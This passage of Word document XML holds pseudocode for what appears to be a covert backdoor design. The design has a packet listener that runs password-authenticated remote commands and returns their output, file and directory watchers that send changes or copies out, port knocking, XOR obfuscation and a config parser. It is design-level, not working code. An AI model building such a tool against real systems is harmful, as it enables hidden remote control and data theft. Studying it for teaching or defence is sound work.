              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     if (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DIRECTORY_to_monitor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> is not null) // we want to watch a directory</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>int</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directoryID</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pthread_create</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>watching_mode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(“directory”))</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     join threads</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     Catch Ctrl + C (or some Termination Command from Client)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     kill all threads</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     exit</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>listener_mode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(“command”) {</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     while true</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 xml:space="preserve">          listens for packets from certain </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> and port</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          if packets match our signature</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 xml:space="preserve">               unscrambled = decrypt (password)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          }</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          if unscrambled == Password</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 xml:space="preserve">               // do some error checking to make sure commands work</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">               run “command”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">               send (command outputs in packet to client)</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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>watching_mode</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>([file | directory])</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     while true</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 xml:space="preserve">          check if file or directory has changed</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          if the file or directory has changed</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">               make note of the change or copy the file</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">               send (the note to client or send the copied file)</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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">send ([file | </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>console_output</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>])</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     knocker(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KNOCKING_ports</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>) // do our port knocking first before we send our data</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     XOR(package up our packet)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     send the packet on its way to client     </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>knocker(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KNOCKING_ports</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     if </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KNOCKING_ports</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> != null // there is a knocking pattern, otherwise do nothing</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 xml:space="preserve">          </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>temp.array</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KNOCKING_ports.split</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>(“,”) // split up the ports</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">          </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>foreach</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> port in </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>temp.array</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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 xml:space="preserve">               send a packet to port</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">               do not wait for a response; sleep (1);</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w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00C60197">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>read(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>config_file</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>{</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">     while (there is a line to read)</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 xml:space="preserve">           read each line of the file, </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">           split using a delimiter (probably “=”) into key, value pairs</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">           switch statement (key)</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 xml:space="preserve">                case “FILE”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>FILE_to_read</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> variable with its value pair</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     break</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                case “KNOCKING”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>KNOCKING_ports</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> to its value pair</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     break</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                case “DIRECTORY”</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     set </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>DIRECTORY_to_monitor</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> to its value pair</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00C60197" w:rsidRDefault="00F90017">
            <w:pPr>
              <w:spacing w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">                     break</w:t>
            </w:r>
          </w:p>
